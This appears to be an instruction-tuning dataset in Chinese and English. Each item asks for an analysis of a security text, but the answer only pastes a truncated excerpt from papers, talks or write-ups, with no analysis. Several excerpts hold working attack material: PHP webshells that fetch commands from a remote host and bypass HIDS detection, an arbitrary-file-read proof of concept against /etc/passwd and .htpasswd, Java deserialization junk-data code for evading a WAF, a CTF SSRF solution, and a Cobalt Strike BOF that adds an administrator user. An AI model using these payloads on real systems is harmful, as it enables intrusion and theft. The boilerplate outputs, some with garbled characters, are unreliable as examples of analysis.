{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 目录 关于OWASP 开源Web应用安全项目OWASP是一个开放 的社区致力于帮助各企业组织开发购买和维护可信任 的应用程序 在OWASP 您可以找到以下免费和开源的信息  应用安全工具和标准  关于应用安全测试安全代码开发和安全代码审查 方面的完整书籍  演示文稿和视频  关于常见风险的Cheat Sheets  标准的安全控制和安全库  全球各地分会  尖端技术研究  专业的全球会议  邮件列表 更多信息请访问 https://www.owasp.org 更多中文信息请访问http://www.owasp.org.cn/ 所有的OWASP工具文档论坛和全球各地分会都 是开放的并对所有致力于改进应用程序安全的人士开放 我们主张将应用程序安全问题看作是人过程和技术 的问题因为提供应用程序安全最有效的方法是在这些方 面提升 OWASP是一个新型组织我们没有商业压力使得 我们能够提供无偏见实用低成本的应用安全信息 尽管OWASP支持合理使用商业安全技术但OWASP 不隶属于任何技术公司和许多开源软件项目一样 OWASP以一种协作开放的方式制作了许多不同种类的 材料 OWASP基金会是确保项目长期成功的非营利性组织 几乎每一个与OWASP相关的人都是一名志愿者这包括 了OWASP董事会全球各地分会会长项目领导和项目 成员 我们用资金和基础设施来支持创新的安全研究 我们期待您的加入 TOC 目录 TOC 目录.. 1 FW 前言 ... 2 I 简介 ..... 3 RN 发布说明 ........................ 4 Risk API安全风险 ................. 5 T10 OWASP API 安全Top 10  2019... 6 API1:2019 失效的对象级别授权 ... 7 API2:2019 失效的用户身份验证.... 8 API3:2019 过度的数据暴露. 9 API4:2019 资源缺乏和速率限制 10 API5:2019 失效的功能级授权. 11 API6:2019 批量分配. 12 API7:2019 安全配置错误.... 13 API8:2019 注入. 14 API9:2019 资产管理不当.... 15 API10:2019 日志和监控不足.. 16 +D 开发人员下一步做什么?.. 17 +DSO DevSecOps下一步做什么.. 18 +DAT 方法和数据.... 19 +ACK 致谢.... 20 https://owasp.org 本文档的发布基于 Creative Commons Attribution Share-Alike 4.0 license 2 FW 前言 在当今应用驱动的世界中创新的一个基本要素是应用程序编程接口API从银行零 售运输到物联网自动驾驶汽车智能城市API都是现代移动SaaS 和 Web应用程序的一个 关键组成部分并且在面向客户面向合作伙伴和面向内部的应用中都会使用到 一般来说API会公开应用程序的逻辑和敏感数据如个人识别信息PII正因为如此 API越来越成为攻击者的目标如果没有安全的 API快速创新将不可能 虽然更为宽泛的 OWASP Top 10仍然具有重要意义但由于API的特殊性质我们需要一份特 定的API安全风险清单API安全聚焦于策略和解决方案以便理解并且缓解与API相关的独特脆 弱点和安全风险 如果您熟悉 OWASP Top 10那么您会发现这两个文件之间的相似之处它们的目的都是为 了更容易阅读和被采纳如果您还不熟悉OWASP Top 10系列您可能需要先阅读本文 API 安全 风险部分和方法和数据部分然后再阅读十大风险列表 您可以在我们Github上的项目仓库为OWASP API Top 10提出您的问题意见和想法  https://github.com/OWASP/API-Security/issues  https://github.com/OWASP/API-Security/blob/master/CONTRIBUTING.md 您可以在以下链接找到OWASP API 安全 Top 10  https://www.owasp.org/index.php/OWASPAPISecurity_Project  https://github.com/OWASP/API-Security 我们感谢所有这个项目的贡献者并将他们全部列致谢部分谢谢您们 3 I 简介 欢迎参阅2019年版OWASP API 安全 Top 10 欢迎阅读第一版OWASP API 安全 Top10如果您熟悉 OWASP Top 10系列您会注 意到它们之间的相似之处它们的目的都是为了更容易阅读和被采纳但是如果您不熟悉这个 系列请考虑先访问 OWASP", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUnlimited Results: Breaking Firmware Encryption of ESP32-V3 Karim M. Abdellatif, Olivier Heriveaux, and Adrian Thillard Motivation  ESP32 is deployed in hundreds of million devices as announced by Espressif 1  ESP32-V3 has been recently used as the main MCU in Jade hardware wallet (Blockstream)2  Encrypted firmware is stored in the external flash  The encryption key is stored in the eFuses of ESP32-V3 1Espressif, Espressif Achieves the 100-Million Target for IoT Chip Shipments, 2018 2https://blockstream.com/jade/ 2 Motivation  ESP32 is deployed in hundreds of million devices as announced by Espressif 1  ESP32-V3 has been recently used as the main MCU in Jade hardware wallet (Blockstream)2  Encrypted firmware is stored in the external flash  The encryption key is stored in the eFuses of ESP32-V3 Jade wallet ESP32-V3 + external flash 1Espressif, Espressif Achieves the 100-Million Target for IoT Chip Shipments, 2018 2https://blockstream.com/jade/ 2 ESP32-V1 vs ESP32-V3 ESP32-V1  Flash encryption and secure boot were broken by LimitedResults3 in 2019  During the power-up eFuse protection bits are manipulated  The main idea is to glitch the chip during the power-up 3LimitedResults, Fatal Fury On ESP32: Time to Release HW Exploits, Blackhat Europe 2019 3 ESP32-V1 vs ESP32-V3 ESP32-V1  Flash encryption and secure boot were broken by LimitedResults3 in 2019  During the power-up eFuse protection bits are manipulated  The main idea is to glitch the chip during the power-up ESP32-V3  In the market since 2020 as a reaction against the previous attack  New secure boot mechanism  It is hardened against fault injection attacks in hardware and software as announced by the vendor 3LimitedResults, Fatal Fury On ESP32: Time to Release HW Exploits, Blackhat Europe 2019 3 Outline ESP32 Security Analysis Fault Injection Setup EMFI on ESP32-V1 EMFI on ESP32-V3 Breaking Firmware Encryption by SCAs Practical Attack Vendor reply and Conclusion 4 ESP32 SECURITY ANALYSIS Security features  Sec", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Inclusiveness > https://download.vulnhub.com/inclusiveness/Inclusiveness.ova 靶场IP`192.168.32.23` 扫描对外端口服务 ``` (rootkali)-[/tmp] # nmap -sV -p1-65535 192.168.32.23 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-14 01:43 EDT Nmap scan report for 192.168.32.23 Host is up (0.00014s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) MAC Address: 08:00:27:04:82:67 (Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.39 seconds ``` FTP匿名访问没有发现有用的东西 ``` (rootkali)-[/tmp] # ftp 192.168.32.23 Connected to 192.168.32.23. 220 (vsFTPd 3.0.3) Name (192.168.32.23:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -al 229 Entering Extended Passive Mode (|||55354|) 150 Here comes the directory listing. drwxr-xr-x 3 0 0 4096 Feb 08 2020 . drwxr-xr-x 3 0 0 4096 Feb 08 2020 .. drwxrwxrwx 2 0 0 4096 Feb 08 2020 pub 226 Directory send OK. ftp> cd pub 250 Directory successfully changed. ftp> ls 229 Entering Extended Passive Mode (|||35394|) 150 Here comes the directory listing. 226 Directory send OK. ftp> ls -al 229 Entering Extended Passive Mode (|||26092|) 150 Here comes the directory listing. drwxrwxrwx 2 0 0 4096 Feb 08 2020 . drwxr-xr-x 3 0 0 4096 Feb 08 2020 .. 226 Directory send OK. ``` 访问80端口 ![image-20220914134749813](../../.gitbook/assets/image-20220914134749813.png) 爆破目录 ``` (rootkali)-[/tmp] # dirb http://192.168.32.23/ ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Wed Sep 14 01:47:53 2022 URL_BASE: http://192.168.32.23/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHIDS PHP WebShell Bypass 研究与分析 do9gy 背景2022 年春天参加了某 HIDS Bypass 挑战赛赛题恰好是关于 PHP WebShell 绕 过的结合 Fuzz 技术获得了几个侥幸可以绕过的样本围绕#WebShell 检测那些事的主题 与各位做一个分享 挑战赛规则如下: 1WebShell 指外部能传参控制(如通过 GET/POST/HTTP Header 头等方式)执行任 意代码 或命令比如 eval($_GET[1]);在文件写固定指令不算 Shell被认定为无 效如<?php system(whoami); 2绕过检测引擎的 WebShell 样本需要同时提供完整有效的 curl 利用方式 如:curl http://127.0.0.1/webshell.php?1=system(\"whoami\")';curl 利用方式可以在 提供的 docker 镜像中进行编写测试地址可以是容器 IP 或者 127.0.0.1文件名 任意以执行 whoami 作为命令示例 3WebShell 必须具备通用性审核时会拉取提交的 WebShell 内容选取一个和 验证镜 像相同的环境进行验证如果不能正常运行则认为无效 4审核验证 payload 有效性时WebShell 文件名会随机化不能一次性执行成功 和稳定 触发的被认定为无效 首先我对查杀引擎进行了一定的猜测根据介绍查杀引擎有两个两个引擎同 时工作只要有一个引擎检测出了 WebShell 返回结果就是查杀根据经验推测应 该是有一个静态的另一个是动态的对于静态引擎的绕过可以通过拆分关键词 加入能够引发解析干扰的畸形字符等;而对于动态引擎需要分析它跟踪了哪些输入 点又是如何跟踪变量的最终是在哪些函数的哪些参数命中了恶意样本规则于是 我开始了一些尝试 0x01 CURL 引入参数 经过分析引擎对$_GET $_POST $_COOKIE $_REQUEST $_FILES $_SERVER $GLOBALS 等几乎一切可以传递用户参数的全局变量都进行了过滤但是对 curl 进来的内容却是没有 任何过滤于是我们可以通过 CURL 引入参数 <?php $url=\"http://x/1.txt\"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch,CURLOPT_HTTPHEADER,$headerArray); $output = curl_exec($ch); curl_close($ch); echo $output; eval($output); 但是在这一点的评判上存在争议本样本惨遭忽略根据挑战赛规则能够动态引入参 数即可我个人认为 CURL 引入的参数也属于外部可控的参数内容 0x02 get_meta_tags 引入参数 get_meta_tags 函数会对给定 url 的 meta 标签进行解析自然也会发起 URL 请求对 于能够发起外连的服务器来说这个 PHP WebShell 样本是极具迷惑性的 不过之前 CURL 的被忽略了这个我也就没有再提交 <?php get_meta_tags(\"http://x/1\")[\"author\"](get_meta_tags(\"http://x/1\")[\" keywords\"]); ?> 此时目标服务器上需要有相应的文件配合 <meta name=\"author\" content=\"system\"> <meta name=\"keywords\" content=\"ls\"> 通过动态修改该文件第二行的内容可以给 system 传入不同的参数参数内容是完全 可控的 0x03 fpm_get_status 引入参数 比赛环境是 php-fpm 架构的此时可以通过 fpm_get_status() 函数来获取参数可打 印调试 <?php var_dump(fpm_get_status()); 由此构造样本 <?php system(fpm_get_status()[\"procs\"][0][\"query-string\"]); 不过并不能保证当前进程一直处于第一位因此我第一次提交的样本虽然简短但是 不满足规则中要求的一次性执行成功和稳定触发因此我后面又对样本进行了补充 <?php foreach(fpm_get_status()[\"procs", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTAKING WINDOWS 10 KERNEL EXPLOITATION TO THE NEXT LEVEL  LEVERAING WRITE- WHAT-WHERE VULNERABILITIES IN CREATORS UPDATE Whoami  Morten Schenk  Security Advisor, Improsec ApS  Twitter - @blomster81  Blog: https://improsec.com/blog/  GitHub: https://github.com/MortenSchenk  What to expect from this talk  Windows 10 Kernel Exploitation on Creators Update  Lots of hex, C and memes  0-days! Agenda  Brief look at Kernel Exploitation history  New Windows 10 Mitigations  Arbitrary Kernel Read/Write Primitive  KASLR information leak  De-randomizing Page Table Entries  Dynamic Function Location  Executable Kernel Memory Allocation Exploitation Concept  Write-What-Where  Vulnerability class  Best case  Write controlled value at controlled address  Common case  Write not controlled value at controlled address  Leverage to obtain kernel-mode code execution Brief Look at Kernel Exploitation History Windows 7  Kernel information leaks were available with NtQuerySystemInformation Brief Look at Kernel Exploitation History Windows 7  Executable NonPagedPool was the default  Execute User-mode memory from Kernel-mode  Window Function running in kernel mode  Overwrite HalDispatchTable function table with user-mode address Brief Look at Kernel Exploitation History Windows 8.1 and Windows 10  Windows 8.1 and Windows 10 before Anniversary Edition.  Kernel information leaks with APIs blocked from Low Integrity.  NonPagedPoolNx is the new standard.  Supervisor Mode Execution Prevention is introduced.  Kernel-mode read / write primitive is needed.  GDI bitmap primitive.  tagWND primitive. Brief Look at Kernel Exploitation History Windows 8.1 and Windows 10  Information leak of Bitmap through GdiSharedHandleTable  Overwrite size of Bitmap using Write-What-Where  Consecutive Bitmaps can create a primitive  SetBitmapBits  GetBitmapBits Brief Look at Kernel Exploitation History Windows 8.1 and Windows 10  Information leak of User-mode mapped Desktop Heap through  ulClientDelta from Win32ClientInf", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n记次某电梯Web系统盒到PHP盒挖掘RCE的过程 概述 闲来事感觉IOT的洞挺好挖记次针对某电梯的Web系统挖掘到的个任意 件上传跟命令注的过程算是对PHP代码审计学习的个记录) 前置知识 PHP执命令函数) 1shell_exec()) string)shell_exec)()string)$cmd)))执命令并将结果作为字符串返回) 返回值如果执失败则返回NULL执成功则返回执结果字符串) 注意This)function)is)disabled)when)PHP)is)running)in)safe)mode) 2passthru()) void)passthru)()string)$command)[,)int)&$return_var)]))) 没有返回值函数直接将执结果返回给浏览器函数第个参数就是执状态 码返回0表成功返回1表失败) 3exec()) string)exec(string)command,)string)[array],)int)[return_var]);) command))需要执的命令) array))是输出值填充的数组(每作为数组的项)) return_var是返回值0或1如果返回0则执成功返回1则执失败) 执不成功时的案个技巧就是使管道命令,)使)2>&1,)命令就会输出shell 执时的错误到$output变量,)输出该变量即可分析) 如exec(convert)a.jpg)b.jpg,)$output,)$return_val);改为exec(convert)a.jpg)b.jpg) 2>&1,)$output,)$return_val);)print_r($output);) 4system()) string)system)()string)$command)[,)int)&$return_var)]))) return_var):命令执状态码返回0表成功返回1表失败) 返回值返回执结果的最后如果失败返回FALSE.) 区别) 1shell_exec())只返回不输出) 2passthru())只输出不返回有状态码) 3exec())返回最后结果所有结果可以保存到个返回的数组有状态 码) 4system())输出返回最后结果)有状态码) 漏洞分析 最早盒发现存在任意件读取 ) 进抓包) ) 篡改成系统其他路径成功读取系统户) POST /app_show_log_lines.php HTTP/1.1) Host: xxx.xxx.xxx.xxx) Content-Type: application/x-www-form-urlencoded) Connection: close) Content-Length: 25) ) fileselection=/etc/passwd) 说明存在任意件读取漏洞这个先暂时记录下来如果没有其他盒能找到的洞 的话就直接利这个对页的URI路径全部爬取进源码读取再审计) ) 接着发现另外个功能可以任意件全部打包成个zip件提供下载) ) 以及在页监控中看进程看到了服务器上正在运apache服务) ) 渗透熟练的伙伴应该知道apache默认站路径是/var/www/html我们直接尝 试打包这个件夹下来看看源码在不在如果不在的话再利上的任意 件读取fuzz跑下apache的配置件再通过从配置件中去寻找对应的web路 径) POC) POST /app_download_zipped_logs.php HTTP/1.1) Host: X.X.X.X) Content-Type: application/x-www-form-urlencoded) Connection: close) Content-Length: 34) ) fileselection[]=/var/www/html/*) ) 成功下载该源码可以开始盒审计) 如果代码量的MVC结构的还是建议扫描器扫遍个习惯喜欢先看看现有 的功能点全部过遍概有个底然后每个代码快速阅读再根据个经验针 对概率出现问题的些功能针对性查看) ) 访问Con`iguration发现访问了authorization.php那我们本地先从这个件开始看) ) 从第32看到最后调校验账号密码是/etc/apache2/.htpasswd件我们利前 的任意件读取即可获得密码) ) 通过cmd5解密cmd5打钱) kone:gateway) admin:kone) 成功登录说明思路没问题) ) 初步看到功能有配置件上传跟下载配置件应升级服务管理时间服务器 管理Web密码修改以及PostgreSQL数据库管理搞IOT漏洞挖掘熟悉的伙 伴如果是盒的话命令注应该会优先看NTP服务器Ping功能相关我们切 到盒去查看对应的代码看看有没过", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 反序列化脏数据 Java反序列化数据绕WAF之加量脏数据 https://mp.weixin.qq.com/s/wvKfe4xxNXWEgtQE4PdTaQ 其实就是再最外层封装层只要该类有对象属性般来说在反序列化的时候都会试着调该属性的 readObject去还原他所以我们要找的class第需要实现java.io.Serializable接第可以存储任 意对象这么看来集合类型就常符合我们的需求 如 1. ArrayList 2. LinkedList 3. HashMap 4. LinkedHashMap 5. TreeMap 这个思路是基于@Y4tacker师傅做的扩展源头总体来说还是这篇章 https://mp.weixin.qq.com/s/KncxkSIZ7HVXZ0iNAX8xPA 如上法还是正常封装java反序列化在ObjectInputStream#readSerialData中有个逻辑即 使某块数据反序列化失败仍然可以继续下块数据的反序列化如LinkedList.add添加多个每个 脏数据1.0 脏数据2.0 Java 复制代码 List<Object> a = new LinkedList<Object>(); a.add(new FindClassByDNS().makeClass(\"TargetClass\")); a.add(new URLDNS().getObject(\"http://1234.z6lh5t.dnslog.cn\", null)); 1 2 3 2 对象不影响下个对象反序列化如下图是个的for循环 skipCustomData应该是于处理些定义数据1200x78是块数据结束符下图是jdk1.6的 3 这是jdk1.8对多个版本主要是确认119和121是否都是操作前看来只有1190x77即 TC_BLOCKDATA是空操作那么就可以在块中插脏数据0x77 4 调试发现 this.readObject0(false) 会调下个序列化数据该bin.peekByte读取的是 0x73 5 尝试插字节测试 发现在readBlockHeader报错了 6 原来这也会读取到119那么这个字节就不能了 其实根据这个思路可以找些其他位置或其他字符来测试 7 简单看了下发现0x70表示Null 并且原来这0x78后也是112(0x70 TC_NULL) 8 所以尝试插发现可以了可以继续反序列化hashmap了这测试的是URLDNS后续就是正常 过程了 仔细跟踪了下 readBlockHeader 如果是112(0x70 TC_NULL)那么就和不插样正常进 后续解析 9 readBlockHeader 是在 this.bin.skipBlockData() 般只会执次然后 this.re adObject0(false) 的switch判断类型如果是112(0x70 TC_NULL)也就跳过不处理继续后续 处理 10 11 绕过119(0x77 TC_BLOCKDATA)的报错了那么我突然想在这后再插119(0x77 TC_BLOCKDATA)是不是也- -傻逼了go写多了case 119没有break会步122那么就会继 续解析之前的blockheader到这突然想到那么我在0x77后再插0x70是不是就绕回来了 这出现了个误解peekByte是不会移动数据流的pos的只有readreadFull等等才会所以这 没有的 12 前看来只能插0x70了 13 其他字节能否有同样效果可以找下skipCustomData() 的解析法 skipBlockData()->readB lockHeader() 和 readObject0() 总结下有两个新的案 1. 填充量null代表的\\x70 14 2. 填充量不存在的class这个其实想填充啥填充啥 Java 复制代码 // 通过LinkedList插count个\\x70 public byte[] junkDataWithNull70(Object obj,int count) throws Exception { // 插不存在的class List<Object> list = new LinkedList<Object>(); list.add(this.makeClass(RandomStringUtils.randomAlphabetic(10) + System.nanoTime())); list.add(obj); // 序列化 byte[] serBytes = Serializer.serialize(list); // 插脏数据 String key = new String(new byte[]{0x78,0x70,0x73,0x7", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCareer Mythbusters Separating Fact from Fiction in your Security Career Lee Kushner / Mike Murray Lee@LJKushner.com / mmurray@episteme.ca 2 Who Are We?  Lee Kushner  Over 10 years of Success Recruitment of Information Security Professionals  Founder and CEO of the Leading Information Security Recruitment Firm, LJ Kushner and Associates LLC  Wide Range of Nationally Based Clients from Fortune 500s to security product vendors  Mike Murray  Security professional with a decade of diverse experience.  Security blogger (Episteme.ca) specializing in talking about security careers, author of the book Forget the Parachute, Let Me Fly the Plane  Has managed security teams and helps people working with him develop the career that they really want to have.  We bring very different perspectives on Careers 3 Were Doing a Survey!  More data required  Through our roles, we gather a lot of anecdotal evidence, but we cant ever have enough hard data.  We want to give you something back.  Fill it out anonymously if you want, or provide an email address and well send you the survey and our analysis when were done.  Well take the data, slice and dice it, and give you more real information about careers in infosec.  Well also give you Mikes e-book on careers to help you know more about finding a job, personal branding tools, etc.  Fill it out: http://www.infosecleaders.com/survey 4 The Big Ones (Myths, that is...)  Job Hunting  Cover Letters Matter.  Resumes arent that important.  The hiring manager should hear of you from your resume.  Interviews are for the companys benefit.  Interviews are about your qualifications.  Managing your Job  Money is the most important benefit.  You will get a raise because you should.  Job title is one of the most important considerations.  Career Path  You should expect to stick with a single company.  Your company will help you figure out your career.  You dont need to plan your career.  You should definitely plan to move in to management.  What you know ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAre all BSDs created equally? A survey of BSD kernel vulnerabili9es.; ! ! ! Ilja!van!Sprundel!<ivansprundel@ioac4ve.com>! Who Am I;  Ilja!van!Sprundel!!  ivansprundel@ioac4ve.com!  Director!of!Penetra4on!Tes4ng!at!IOAc4ve!!  Pen!test!  Code!review!  Break!stuff!for!fun!and!profit!J!! Outline/Agenda ;  Intro!  Data!!  vulnerabili4es!over!the!years!  Test!by!audit!  Common!aJack!surface!!  Somewhat!less!common!aJack!surface!!  Some!results!/!conclusions!! What is this talk about? ;  BSD!kernel!vulnerabili4es!!  Comparison!!  Between!different!BSD!flavors!!  Audience!!  Low!level!security!enthusiasts!!  UNIX/BSD!geeks!!  I!suspect!Linux!folks!might!enjoy!this!too!J!  Curious!people!that!like!to!poke!around!in!OS!internals!  Knowledge!!  Some!basic!knowledge!of!UNIX!/!BSD!internals!!! Standing on the shoulders of giants;  Previous!interes4ng!BSD!kernel!security! research!by:!!  Silvio!!  the!noir!  Esa!Etelavuori!  Patroklos!(argp)!Argyroudis!  Christer!Oberg!!  Joel!Erikkson!!  Clement!Lecigne! intro; Really? Got Data?;  Somehow!that!statement!has!always! been!stuck!in!my!head!!  Is!it!true?!!  Can!we!look!at!some!data!?!! Source: hFps://www.cvedetails.com/product/47/Linux-Linux-Kernel.html; Data! ;  Goes!from!current!back!to!1999!for!Linux!kernel!vulnerabili4es!!  Cvedetails.com!doesnt!seem!to!provide!data!for!OBSD/NBSD/FBSD!!  Manually!grab!it!from!!  hJps://www.freebsd.org/security/advisories.html!  hJp://netbsd.org/support/security/advisory.html!  hJps://www.openbsd.org/errata*.html! BSD kernel vulnerabili9es over the years ;  Looking!at!these!numbers,!that!was!an!astute! observa4on!by!Theo.!!  20!was!a!very!low!es4mate!!  But!are!these!numbers!on!equal!foo4ng?!!  Many!eyeballs?!!  Yea,!yea,!I!know!.!But!is!there!some!truth!to!it!in!this! case?!!! FreeBSD! NetBSD! OpenBSD! 1999! 3! 8! 10! 2000! 8! 4! 15! 2001! 6! 7! 13! 2002! 11! 6! 11! 2003! 7! 3! 8! 2004! 8! 5! 13! 2005! 11! 8! 4! 2006! 9! 15! 6! 2007! 1! 4! 9! 2008! 8! 6! 7! 2009! 5! 1! 4! 2010! 3! 6! 8! 2011! 1! 2!", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# double Web, Easy ## Description > Get the /flag at http://108.61.211.185/ ## Solution When accessing the site we get the following output: ```python import string import urllib2 from bottle import route, run, post, get, request @get('/') def index(): with open(__file__) as f: return '<pre>' + \"\".join({'<':'<','>':'>'}.get(c,c) for c in f.read()) + '</pre>' @post('/isup') @get('/isup') def isup(): try: name = request.params.get('name', None) ip = request.environ.get('REMOTE_ADDR') is_remote = not (ip.startswith('127') or ip.startswith('172')) is_valid = all(x in name for x in ['http', 'kuchenblech']) if is_remote and not is_valid: raise Exception result = urllib2.urlopen(name).read() return result except: return 'Error' run(host='0.0.0.0', server=\"paste\", port=8080, reloader=False) ``` It looks like the root directory prints the source of the backend script. Using the `/isup` page, we can read a webpage via `urllib2.urlopen(name).read()`, assuming we comply with the preconditions: * If our IP is identified as a remote IP (i.e. it starts with `127` or `172`), we can only read URLs which contain both `http` and `kuchenblech` (note: The CTF domain was `http://kuchenblech.xyz/`). * Local IPs can read any URL. `127.*.*.*` should be familiar to everyone. Let's research `172.*.*.*` addresses: > If the 1st octet is 172 and the 2nd octet of a IPv4 address is 1631, you have a private IP address, similar to 192.168.x.x or 10.x.x.x. These are the 3 private IP address ranges that are reserved per RFC 1918. > > ... > > If the 2nd octet of an IPv4 address starting with 172 is anything other than 1631, its a publicly routable IP, just like almost any other. > ([Source](https://www.quora.com/What-is-the-significance-of-IP-addresses-starting-with-172)) So, using a proxy which starts with `172` we can bypass the `is_valid` check. But what should we send as the `name`? Sending `http://108.61.211.185/flag` didn't work, perhaps `/flag` is a local file? It turns out `urlopen` can open lo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCan You Trust Autonomous Vehicles: Contactless Attacks against Sensors of Self-driving Vehicle Jianhao Liu 360 ADLAB SKY-GO Team Chen Yan Zhejiang University Wenyuan Xu Zhejiang University & University of South Carolina Paddy Liu Director of Qihoo360 ADLAB SKY-GO Team Vehicle Cyber Security Jianhao Liu is a senior security consultant at Qihoo 360 who focuses on the security of Internet of Things and Internet of Vehicles. He has reported a security vulnerability of Tesla Model S, led a security research on the remote control of a BYD car, and participated in the drafting of security standards among the automobile society. Being a security expert employed by various information security organizations and companies, he is well experienced in security service, security evaluation, and penetration test. Who Am I 2 Chen Yan Ph.D. Student Ubiquitous System Security Laboratory (USSLAB) Zhejiang University, China His research focuses on the security and privacy of wireless communication and embedded systems, including automobile, analog sensors, and IoT devices. Who Am I 3 Wenyuan Xu Professor Zhejiang University, China University of South Carolina, United States Her research interests include wireless security, network security, and IoT security. She is among the first to discover vulnerabilities of tire pressure monitor systems in modern automobiles and automatic meter reading systems. Dr. Xu received the NSF Career Award in 2009. She has served on the technical program committees for several IEEE/ACM conferences on wireless networking and security, and she is an associated editor of EURASIP Journal on Information Security. Who Am I 4 Table of Contents  Autonomous Vehicles  Basics of automated driving  Hacking autonomous cars by sensors  Attacking ultrasonic sensors  Attacking MMW Radars  Attacking cameras  Discussion 5 What is Autonomous Vehicle? 6 Source:Michael Aeberhard, BMW Group Research and Technology Levels of Driving Automation 7 Connected Automated Vehicles 8 How", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 bof测 个正常C程序如何转换成bof件这记录下过程 bof的原理实现就不多讲了简单来说就是编译成个object件COFF格式exe是PE格式然后 传输给beacon后在终端上完成链接过程这也就导致bof件常般只有K 参考 https://wbglil.gitbook.io/cobalt-strike/cobalt-strike-yuan-li-jie-shao/untitled-3 在github有个不错的开源项可以以此为模板进步开发不需要完全重头开始 https://github.com/trustedsec/CS-Situational-Awareness-BOF https://github.com/securifybv/Visual-Studio-BOF-template 我是基于第个项开发这个项有很多已实现的案例可作为参考 SA录就是编译成object的件于直接提供cs使 src是源码录除了已实现功能的源码还提供了个base_template作为模板 编写bof代码 2 将base_template拷份到src/SA下改成如useraddBOFNAME也修改下便发布 3 然后看下核代码部分这其实考虑到了两种使场景了bof提供cs使exe供独使也便 调试功能是否正常编译的时候只需要带上-DBOF即可编译成bof bof和exe区别如下exe固定是main函数bof会由加载器扫描go函数的地址作为当然 也可以是其他名字默认是go 4 bof编写般会导个beacon.h有些内置的函数提供如我要打印内容给teamsever显示 就可以调BeaconPrintf其他函数和使可参考这个官链接 https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/b eacon-object-files_main.htm 接着就是编写功能了如添加户这有个C项有现成代码 https://github.com/newsoft/adduser 代码较简单调NetUserAdd添加户然后调 NetLocalGroupAddMembers 加 administrators组 5 但这些都是直接调的win32api如果看了上提供的bof官档就会知道这些api需要动态加载调 不像是PE件有导表那官提供了两种法是调loadlibrary等函数动态加载是动态 函数解析(DFR)我这选择后者这个便些 6 在src\\common\\bofdefs.h添加宏定义于动态函数解析 并添加函数声明于外部调 如上操作即可完成动态函数解析然后在我们要编写的代码替换成带有lib名称的函数即可 C 复制代码 #define NETAPI32$NetUserAdd NetUserAdd 1 C 复制代码 WINBASEAPI DWORD WINAPI NETAPI32$NetUserAdd(LPCWSTR,DWORD,PBYTE,PDWORD); 1 7 繁琐的地主要在于要查微软官档然后才知道函数签名 这个项动完成这个过程了通过个本地函数库获取函数签名再通过微软在线查询该函数对应的 lib件名是什么拼接实现上声明代码 https://github.com/dtmsecurity/bof_helper 效果如下然后最后复制到bofdefs.h即可 把需要打印回显的位置替换成BeaconPrintfbof的项还做了个封装更便使 internal_p rintf 8 使make bof尝试编译是否正常 然后cs调可以正常加载但有个问题这样是法传参的 C 复制代码 inline-execute [dirpath]\\useradd.x64.o 1 9 如这样是法传参的 看下go的解析参数代码这个是参考其他功能的代码cs内置个datap数据类型于数据解 析先调BeaconDataParse将缓存放parser再通过BeaconDataExtract提取 参看官册提供了五种函数于数据提取也就是说数据类型也5种int/char*/wchar_t*/short 等那如果是命令传递是不可能知道数据类型的仔细看档第提示了需要结合cna脚本的 参数解析问题 C 复制代码 inline-execute [dirpath]\\useradd.x64.o user pass 1 10 bof_pack函数来pack格式化参数传递所以需要编写cna脚本了 这个bof项也提供了现成的cna脚本所以只需要参考改下即可 代码如下很简单,添加个函数useradd然后通过 beacon_command_register 注册 cna脚本编写 11 PS: readbof是这个项定义的函数于读取bof完整", "category": "text_analysis", "source": "security_papers"}
